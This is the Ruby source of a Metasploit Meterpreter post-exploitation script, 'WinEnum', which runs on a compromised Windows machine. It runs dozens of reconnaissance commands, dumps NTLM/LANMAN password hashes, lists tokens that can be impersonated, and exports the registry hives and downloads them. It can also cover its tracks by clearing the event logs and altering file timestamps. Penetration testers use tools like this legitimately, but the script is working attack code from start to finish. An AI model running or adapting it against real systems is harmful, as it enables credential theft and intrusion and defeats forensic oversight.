# $Id$ # $Revision$ # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @client = client opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], "-m" => [ false, "Migrate the Meterpreter Session from it current process to a new cmd.exe before doing anything" ], "-r" => [ false, "Dump, compress and download entire Registry" ], "-c" => [ false, "Change Access, Modified and Created times of executables that were run on the target machine and clear the EventLog" ] ) rd = nil mg = nil cm = nil opts.parse(args) { |opt, idx, val| case opt when '-r' rd = 1 when '-m' mg = 1 when '-c' cm = 1 when "-h" print_line "WinEnum -- Windows local enumeration" print_line print_line "Retrieves all kinds of information about the system" print_line "including environment variables, network interfaces," print_line "routing, user accounts, and much more. Results are" print_line "stored in #{::File.join(Msf::Config.log_directory,'scripts', 'winenum')}" print_line(opts.usage) raise Rex::Script::Completed end } #------------------------------------------------------------------------------- host,port = @client.tunnel_peer.split(':') info = @client.sys.config.sysinfo # Create Filename info to be appended to downloaded files filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") # Create a directory for the logs logs = ::File.join(Msf::Config.log_directory,'scripts', 'winenum',Rex::FileUtils.clean_path(info['Computer'] + filenameinfo)) @logfol = logs # Create the log directory ::FileUtils.mkdir_p(logs) #log file name @dest = logs + "/" + Rex::FileUtils.clean_path(info['Computer'] + filenameinfo) + ".txt" # Commands that will be ran on the Target commands = [ 'cmd.exe /c set', 'arp -a', 'ipconfig /all', 'ipconfig /displaydns', 'route print', 'net view', 'netstat -nao', 'netstat -vb', 'netstat -ns', 'net accounts', 'net accounts /domain', 'net session', 'net share', 'net group', 'net user', 'net localgroup', 'net localgroup administrators', 'net group administrators', 'net view /domain', 'netsh firewall show config', 'tasklist /svc', 'tasklist /m', 'gpresult /SCOPE COMPUTER /Z', 'gpresult /SCOPE USER /Z' ] # Windows 2008 Commands win2k8cmd = [ 'servermanagercmd.exe -q', 'cscript /nologo winrm get winrm/config', ] # Commands that MACE will be changed cmdstomp = [ 'cmd.exe', 'reg.exe', 'ipconfig.exe', 'route.exe', 'net.exe', 'netstat.exe', 'netsh.exe', 'makecab.exe', 'tasklist.exe', 'wbem\\wmic.exe', 'gpresult.exe' ] # WMIC Commands that will be executed on the Target wmic = [ 'useraccount list', 'group list', 'service list brief', 'volume list brief', 'logicaldisk get description,filesystem,name,size', 'netlogin get name,lastlogon,badpasswordcount', 'netclient list brief', 'netuse get name,username,connectiontype,localname', 'share get name,path', 'nteventlog get path,filename,writeable', 'process list brief', 'startup list full', 'rdtoggle list', 'product get name,version', 'qfe', ] #Specific Commands for Windows vista for Wireless Enumeration vstwlancmd = [ 'netsh wlan show interfaces', 'netsh wlan show drivers', 'netsh wlan show profiles', 'netsh wlan show networks mode=bssid', ] # Commands that are not present in Windows 2000 nonwin2kcmd = [ 'netsh firewall show config', 'tasklist /svc', 'gpresult /SCOPE COMPUTER /Z', 'gpresult /SCOPE USER /Z', 'prnport -l', 'prnmngr -g', 'tasklist.exe', 'wbem\\wmic.exe', 'netsh.exe', ] # Executables not pressent in Windows 2000 nowin2kexe = [ 'netsh.exe', 'gpresult.exe', 'tasklist.exe', 'wbem\\wmic.exe', ] ################## Function Declarations ################## def findprogs() print_status("Extracting software list from registry") proglist = "" threadnum = 0 a = [] appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ] appkeys.each do |keyx86| soft_keys = registry_enumkeys(keyx86) if soft_keys soft_keys.each do |k| if threadnum < 10 a.push(::Thread.new { begin dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName") dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion") proglist << "#{dispnm},#{dispversion}" rescue end }) threadnum += 1 else sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? threadnum = 0 end end end end file_local_write("#{@logfol}/programs_list.csv",proglist) end # Function to check if Target Machine a VM # Note: will add soon Hyper-v and Citrix Xen check. def chkvm() check = nil vmout = '' info = @client.sys.config.sysinfo print_status "Checking if #{info['Computer']} is a Virtual Machine ........" # Check for Target Machines if running in VM, only fo VMware Workstation/Fusion begin key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS' root_key, base_key = @client.sys.registry.splitkey(key) open_key = @client.sys.registry.open_key(root_key,base_key,KEY_READ) v = open_key.query_value('SystemManufacturer') sysmnfg = v.data.downcase if sysmnfg =~ /vmware/ print_status "\tThis is a VMware Workstation/Fusion Virtual Machine" vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n" check = 1 elsif sysmnfg =~ /xen/ print_status("\tThis is a Xen Virtual Machine.") check = 1 end rescue end if check != 1 begin #Registry path using the HD and CD rom entries in the registry in case propirtary tools are #not installed. key2 = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" root_key2, base_key2 = @client.sys.registry.splitkey(key2) open_key2 = @client.sys.registry.open_key(root_key2,base_key2,KEY_READ) v2 = open_key2.query_value('Identifier') if v2.data.downcase =~ /vmware/ print_status "\tThis is a VMWare virtual Machine" vmout << "This is a VMWare virtual Machine\n\n" elsif v2.data =~ /vbox/ print_status "\tThis is a Sun VirtualBox virtual Machine" vmout << "This is a Sun VirtualBox virtual Machine\n\n" elsif v2.data.downcase =~ /xen/ print_status "\tThis is a Xen virtual Machine" vmout << "This is a Xen virtual Machine\n\n" elsif v2.data.downcase =~ /virtual hd/ print_status "\tThis is a Hyper-V/Virtual Server virtual Machine" vmout << "This is a Hyper-v/Virtual Server virtual Machine\n\n" end rescue::Exception => e end end vmout end #------------------------------------------------------------------------------- # Function for running a list a commands stored in a array, return string def list_exec(cmdlst) print_status("Running Command List ...") i = 0 a =[] @client.response_timeout=120 cmdlst.each do |cmd| if i < 10 a.push(::Thread.new { r,cmdout='',"" print_status "\trunning command #{cmd}" r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) cmdout << d file_local_write("#{@logfol}/#{cmd.gsub(/(\W)/,"_")}.txt",cmdout) end cmdout = "" r.channel.close r.close }) i += 1 else sleep(0.10) and a.delete_if {|x| not x.alive?} while not a.empty? i = 0 end end a.delete_if {|x| not x.alive?} while not a.empty? end #------------------------------------------------------------------------------- # Function for running a list of WMIC commands stored in a array, returns string def wmicexec(wmiccmds= nil) print_status("Running WMIC Commands ....") i, a = 0, [] @client.response_timeout=120 begin tmp = @client.fs.file.expand_path("%TEMP%") wmiccmds.each do |wmi| if i < 10 a.push(::Thread.new { tmpout = '' wmicfl = tmp + "\\#{sprintf("%.5d",rand(100000))}.csv" print_status "\trunning command wmic #{wmi}" flname = "#{@logfol}/wmic_#{wmi.gsub(/(\W)/,"_")}.csv" r = @client.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi} /format:csv", nil, {'Hidden' => true}) sleep(2) #Making sure that WMIC finishes before executing next WMIC command prog2check = "wmic.exe" found = 0 while found == 0 @client.sys.process.get_processes().each do |x| found =1 if prog2check == (x['name'].downcase) sleep(0.5) found = 0 end end end r.close # Read output of WMIC wmioutfile = @client.fs.file.new(wmicfl, "rb") until wmioutfile.eof? tmpout << wmioutfile.read end wmioutfile.close # Create file with output of command filewrt(flname,tmpout) # Delete created file on disk begin @client.fs.file.rm(wmicfl) rescue end }) i += 1 else sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty? i = 0 end end a.delete_if {|x| not x.alive?} while not a.empty? rescue ::Exception => e print_status("Error running WMIC commands: #{e.class} #{e}") end end #------------------------------------------------------------------------------- #Function for getting the NTLM and LANMAN hashes out of a system def gethash() print_status("Dumping password hashes...") begin hash = '' @client.core.use("priv") select(nil, nil, nil, 3) hashes = @client.priv.sam_hashes hashes.each do |h| hash << h.to_s+"\n" end hash << "\n\n\n" print_status("Hashes Dumped") rescue ::Exception => e print_status("\tError dumping hashes: #{e.class} #{e}") print_status("\tPayload may be running with insuficient privileges!") end flname = "#{@logfol}/hashdump.txt" file_local_write(flname,hash) end #------------------------------------------------------------------------------- #Function that uses the incognito features to list tokens on the system that can be used def listtokens() begin print_status("Getting Tokens...") dt = '' @client.core.use("incognito") i = 0 dt << "****************************\n" dt << " List of Available Tokens\n" dt << "****************************\n\n" while i < 2 tokens = @client.incognito.incognito_list_tokens(i) if i == 0 tType = "User" else tType = "Group" end dt << "#{tType} Delegation Tokens Available \n" dt << "======================================== \n" tokens['delegation'].each_line{ |string| dt << string + "\n" } dt << "\n" dt << "#{tType} Impersonation Tokens Available \n" dt << "======================================== \n" tokens['impersonation'].each_line{ |string| dt << string + "\n" } i += 1 break if i == 2 end print_status("All tokens have been processed") rescue ::Exception => e print_status("Error Getting Tokens: #{e.class} #{e}") end file_local_write("#{@logfol}/tokens.txt",dt) end #------------------------------------------------------------------------------- # Function for clearing all event logs def clrevtlgs() evtlogs = [ 'security', 'system', 'application', 'directory service', 'dns server', 'file replication service' ] print_status("Clearing Event Logs, this will leave and event 517") begin evtlogs.each do |evl| print_status("\tClearing the #{evl} Event Log") log = @client.sys.eventlog.open(evl) log.clear file_local_write(@dest,"Cleared the #{evl} Event Log") end print_status("All Event Logs have been cleared") rescue ::Exception => e print_status("Error clearing Event Log: #{e.class} #{e}") end end #------------------------------------------------------------------------------- # Function for Changing Access Time, Modified Time and Created Time of Files Supplied in an Array # The files have to be in %WinDir%\System32 folder. def chmace(cmds) windir = '' print_status("Changing Access Time, Modified Time and Created Time of Files Used") windir = @client.fs.file.expand_path("%WinDir%") cmds.each do |c| begin @client.core.use("priv") filetostomp = windir + "\\system32\\"+ c fl2clone = windir + "\\system32\\chkdsk.exe" print_status("\tChanging file MACE attributes on #{filetostomp}") @client.priv.fs.set_file_mace_from_file(filetostomp, fl2clone) file_local_write(@dest,"Changed MACE of #{filetostomp}") rescue ::Exception => e print_status("Error changing MACE: #{e.class} #{e}") end end end #------------------------------------------------------------------------------- #Dumping and Downloading the Registry of the target machine def regdump(pathoflogs,filename) host,port = @client.tunnel_peer.split(':') #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress garbage = '' hives = %w{HKCU HKLM HKCC HKCR HKU} windir = @client.fs.file.expand_path("%WinDir%") print_status('Dumping and Downloading the Registry') hives.each do |hive| begin print_status("\tExporting #{hive}") r = @client.sys.process.execute("cmd.exe /c reg.exe export #{hive} #{windir}\\Temp\\#{hive}#{filename}.reg", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) garbage << d end r.channel.close r.close print_status("\tCompressing #{hive} into cab file for faster download") r = @client.sys.process.execute("cmd.exe /c makecab #{windir}\\Temp\\#{hive}#{filename}.reg #{windir}\\Temp\\#{hive}#{filename}.cab", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) garbage << d end r.channel.close r.close rescue ::Exception => e print_status("Error dumping Registry Hives #{e.class} #{e}") end end #Downloading compressed registry Hives hives.each do |hive| begin print_status("\tDownloading #{hive}#{filename}.cab to -> #{pathoflogs}/#{host}-#{hive}#{filename}.cab") @client.fs.file.download_file("#{pathoflogs}/#{host}-#{hive}#{filename}.cab", "#{windir}\\Temp\\#{hive}#{filename}.cab") file_local_write(@dest,"Dumped and Downloaded #{hive} Registry Hive") sleep(5) rescue ::Exception => e print_status("Error Downloading Registry Hives #{e.class} #{e}") end end #Deleting left over files print_status("\tDeleting left over files") @client.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'}) end #------------------------------------------------------------------------------- # Function that will call 2 other Functions to cover all tracks def covertracks(cmdstomp) clrevtlgs() info = @client.sys.config.sysinfo trgtos = info['OS'] if trgtos =~ /(Windows 2000)/ chmace(cmdstomp - nonwin2kcmd) else chmace(cmdstomp) end end #------------------------------------------------------------------------------- # Functions Provided by natron (natron 0x40 invisibledenizen 0x2E com) # for Process Migration #--------------------------------------------------------------------------------------------------------- def launchProc(target) print_status("Launching hidden #{target}...") # Set the vars; these can of course be modified if need be cmd_exec = target cmd_args = nil hidden = true channelized = nil use_thread_token = false # Launch new process newproc = @client.sys.process.execute(cmd_exec, cmd_args, 'Channelized' => channelized, 'Hidden' => hidden, 'InMemory' => nil, 'UseThreadToken' => use_thread_token) print_status("Process #{newproc.pid} created.") return newproc end #------------------------------------------------------------------------------- def migrateToProc(newproc) # Grab the current pid info server = @client.sys.process.open print_status("Current process is #{server.name} (#{server.pid}). Migrating to #{newproc.pid}.") # Save the old process info so we can kill it after migration. oldproc = server.pid # Do the migration @client.core.migrate(newproc.pid.to_i) print_status("Migration completed successfully.") # Grab new process info server = @client.sys.process.open print_status("New server process: #{server.name} (#{server.pid})") return oldproc end #------------------------------------------------------------------------------- def killApp(procpid) @client.sys.process.kill(procpid) print_status("Old process #{procpid} killed.") end #--------------------------------------------------------------------------------------------------------- # Function to execute process migration def migrate() target = 'cmd.exe' newProcPid = launchProc(target) oldProc = migrateToProc(newProcPid) #killApp(oldProc) #Dangerous depending on the service exploited end #--------------------------------------------------------------------------------------------------------- #Function for Checking for UAC def uaccheck() uac = is_uac_enabled? if uac print_status("\tUAC is Enabled") else print_status("\tUAC is Disabled") end return uac end #check for proper Meterpreter Platform def unsupported print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end unsupported if client.platform !~ /win32|win64/i ################## MAIN ################## # Execute Functions selected if (mg != nil) migrate() end # Main part of script, it will run all function minus the ones # that will chance the MACE and Clear the Event log. print_status("Running Windows Local Enumerion Meterpreter Script") print_status("New session on #{host}:#{port}...") # Header for File that will hold all the output of the commands info = @client.sys.config.sysinfo header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n" header << "Running as: #{@client.sys.config.getuid}\n" header << "Host: #{info['Computer']}\n" header << "OS: #{info['OS']}\n" header << "\n\n\n" print_status("Saving general report to #{@dest}") print_status("Output of each individual command is saved to #{@logfol}") file_local_write(@dest,header) file_local_write(@dest,chkvm()) trgtos = info['OS'] uac = uaccheck() # Run Commands according to OS some commands are not available on all versions of Windows if trgtos =~ /(Windows XP)/ if trgtos =~ /(2600, \)|2600, Service Pack 1\))/ commands.delete('netstat -vb') commands.delete('netsh firewall show config') end list_exec(commands) wmicexec(wmic) findprogs() gethash() elsif trgtos =~ /(Windows .NET)/ list_exec(commands) wmicexec(wmic) findprogs() gethash() elsif trgtos =~ /(Windows 2008)/ list_exec(commands + win2k8cmd) wmicexec(wmic) findprogs() if not is_system? print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.") else gethash() end elsif trgtos =~ /Windows (Vista|7)/ list_exec(commands + vstwlancmd) # Check for UAC and save results if uac file_local_write(@dest,"UAC is Enabled") else file_local_write(@dest,"UAC is Disabled") end wmicexec(wmic) findprogs() if not is_system? print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.") else gethash() end elsif trgtos =~ /(Windows 2000)/ list_exec(commands - nonwin2kcmd) gethash() end listtokens() if (rd != nil) if not uac regdump(logs,filenameinfo) else print_status("UAC is enabled, Registry Keys could not be dumped under current privileges") end end if (cm != nil) if trgtos =~ /(Windows 2000)/ covertracks(cmdstomp - nowin2kexe) else if not uac covertracks(cmdstomp) else print_status("UAC is enabled, Logs could not be cleared under current privileges") end end end print_status("Done!")